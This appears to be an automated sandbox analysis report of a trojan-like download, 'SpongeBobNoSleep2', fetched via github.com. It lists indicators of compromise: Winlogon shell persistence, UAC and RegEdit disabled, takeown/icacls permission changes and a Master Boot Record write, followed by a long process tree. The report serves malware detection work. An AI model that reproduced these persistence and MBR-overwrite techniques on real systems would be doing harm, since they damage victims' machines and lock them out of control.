Analysis
-
max time kernel
368s -
max time network
412s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-11-2024 05:04
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://github.com
Resource
win11-20241023-en
Errors
General
-
Target
http://github.com
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" gdifuncs.exe -
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" gdifuncs.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 5392 takeown.exe 2876 icacls.exe 1956 takeown.exe 2276 icacls.exe -
Executes dropped EXE 3 IoCs
Processes:
mbr.exeMainWindow.exegdifuncs.exepid process 4792 mbr.exe 2744 MainWindow.exe 4992 gdifuncs.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 5392 takeown.exe 2876 icacls.exe 1956 takeown.exe 2276 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
Processes:
flow ioc 261 https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
mbr.exedescription ioc process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
Drops file in Windows directory 4 IoCs
Processes:
cmd.exedescription ioc process File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav cmd.exe File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
SpongebobNoSleep2.exembr.exeMainWindow.exegdifuncs.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpongebobNoSleep2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MainWindow.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gdifuncs.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 756 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4456 taskkill.exe -
Modifies Control Panel 3 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe -
Modifies registry class 5 IoCs
Processes:
msedge.exeBackgroundTransferHost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\SpongeBobNoSleep2 (HorrorBob5).zip:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exegdifuncs.exepid process 2492 msedge.exe 2492 msedge.exe 4200 msedge.exe 4200 msedge.exe 704 msedge.exe 704 msedge.exe 2292 identity_helper.exe 2292 identity_helper.exe 4448 msedge.exe 4448 msedge.exe 4448 msedge.exe 4448 msedge.exe 2720 msedge.exe 2720 msedge.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe 4992 gdifuncs.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
msedge.exepid process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
AUDIODG.EXEgdifuncs.exedescription pid process Token: 33 4492 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4492 AUDIODG.EXE Token: SeDebugPrivilege 4992 gdifuncs.exe Token: SeDebugPrivilege 4992 gdifuncs.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
Processes:
msedge.exepid process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
SpongebobNoSleep2.exeMainWindow.exepid process 1728 SpongebobNoSleep2.exe 2744 MainWindow.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4200 wrote to memory of 2704 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 2704 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 400 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 2492 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 2492 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe PID 4200 wrote to memory of 72 4200 msedge.exe msedge.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://github.com1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x48,0x10c,0x7ff88aa53cb8,0x7ff88aa53cc8,0x7ff88aa53cd82⤵PID:2704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:22⤵PID:400
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2492 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:82⤵PID:72
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:12⤵PID:2356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:1388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:12⤵PID:3740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵PID:1728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:12⤵PID:2660
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:12⤵PID:112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:82⤵PID:4716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵PID:2448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:3964
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:2892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:704 -
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6036 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2292 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:12⤵PID:3816
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:12⤵PID:684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:12⤵PID:2480
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:12⤵PID:832
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:12⤵PID:4984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3880 /prefetch:82⤵PID:3372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:12⤵PID:4584
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6632 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4448 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6992 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:12⤵PID:1888
-
